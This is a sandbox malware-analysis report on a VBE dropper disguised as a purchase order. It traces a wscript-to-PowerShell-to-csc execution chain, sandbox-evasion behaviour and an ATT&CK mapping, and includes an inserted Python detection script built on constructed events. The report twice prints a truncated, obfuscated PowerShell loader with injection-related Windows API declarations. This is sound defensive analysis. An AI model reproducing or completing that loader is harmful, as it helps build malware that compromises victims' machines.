Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl 
BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_031461C5 push FFFFFFC3h; ret 3_2_03146264
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_03146070 push FFFFFFC3h; ret 3_2_03146174
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (76 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TID 3344 | Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000003.252733876.000001332B549000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dHe6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266939098.000001332B839000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.267864017.00000133295FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268235777.000001332B731000.00000004.00000020.00020000.00000000.sdmp, PO-08784 xlsx.vbe | Binary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.534323736.0000000005304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: wscript.exe, 00000000.00000003.266250386.000001332B9AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl 
birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl 
BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"
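The chain wscript.exe -> cmd.exe / powershell.exe -> csc.exe -> cvtres.exe recorded in these lines is what the "Wscript starts Powershell", "Very long command line found" and Sigma "Dot net compiler compiles file from suspicious location" signatures key on. The script below is an added example and not part of the Joe Sandbox report; it shows how those checks look when written against process-creation telemetry: a script host spawning a shell, a shell spawning the .NET compiler, csc.exe reading its response file from a temp directory, and an oversized command line. The events are constructed to mirror this report (PIDs 6000, 5984 and 5064 and the command lines follow the report; the PIDs for csc.exe and cvtres.exe, the explorer parent, the benign control entries and the shortened PowerShell argument are made up), and the 4096-character threshold is an assumption to tune per environment.

```python
import re

# Constructed Sysmon-style process-creation events modelled on the chain in this report:
# wscript.exe -> cmd.exe / powershell.exe -> csc.exe -> cvtres.exe. PIDs 6000/5984/5064 and the
# command lines follow the report; the other PIDs, the two control events at the end and the
# shortened PowerShell argument ("x" * 6000 stands in for the $Thyridia blob) are made up.
EVENTS = [
    {"pid": 6000, "ppid": 4000, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"'},
    {"pid": 5984, "ppid": 6000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"CMD.EXE /c echo C:\Windows"},
    {"pid": 5064, "ppid": 6000, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = ' + "x" * 6000 + '"'},
    {"pid": 1234, "ppid": 5064, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
                r'@"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline"'},
    {"pid": 1235, "ppid": 1234, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '
                r'"/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" '
                r'"c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"'},
    # benign control: a build tool compiling with a response file inside the project tree
    {"pid": 2000, "ppid": 1999, "image": r"C:\Program Files\dotnet\dotnet.exe", "cmdline": "dotnet build"},
    {"pid": 2001, "ppid": 2000, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.cmdline"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
COMPILERS = {"csc.exe", "vbc.exe"}
# User-writable drop locations; project trees and Program Files deliberately do not match.
SUSPICIOUS_DIRS = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Users\\Public)\\", re.I)
RESPONSE_FILE = re.compile(r'@"?([^"\s]+\.cmdline)', re.I)
LONG_CMDLINE = 4096  # assumed threshold; tune to the environment's baseline


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from `pid` upwards, stopping at the first ancestor missing from the event set."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def analyze(events):
    """Return (pid, rule) findings, one per matched rule, in event order."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name in SHELLS and pname in SCRIPT_HOSTS:
            findings.append((e["pid"], "script_host_spawns_shell"))
        if len(e["cmdline"]) > LONG_CMDLINE:
            findings.append((e["pid"], "very_long_cmdline"))
        if name in COMPILERS:
            m = RESPONSE_FILE.search(e["cmdline"])
            if m and SUSPICIOUS_DIRS.search(m.group(1)):
                findings.append((e["pid"], "compiler_response_file_in_temp"))
            if pname in SHELLS:
                findings.append((e["pid"], "shell_spawns_compiler"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyze(EVENTS):
        print(f"{rule}: pid {pid}, chain {' <- '.join(ancestry(EVENTS, pid))}")
```

The control entries matter as much as the hits: csc.exe is a legitimate part of every .NET build, so the compiler rule only fires when the response file sits in a temp location or the parent is a shell, and the dotnet-driven compile stays silent. cvtres.exe produces no finding of its own; it is reported through the ancestry of csc.exe, which is how the chain in this report would surface in a SIEM.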
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ATT&CK matrix, listed by tactic column (leading digits are the count badges shown in the original matrix; entries without a badge are the unmatched default techniques):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 21 Command and Scripting Interpreter; 11 Scripting; 1 PowerShell; At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: 11 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 11 Scripting; 1 Obfuscated Files or Information
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
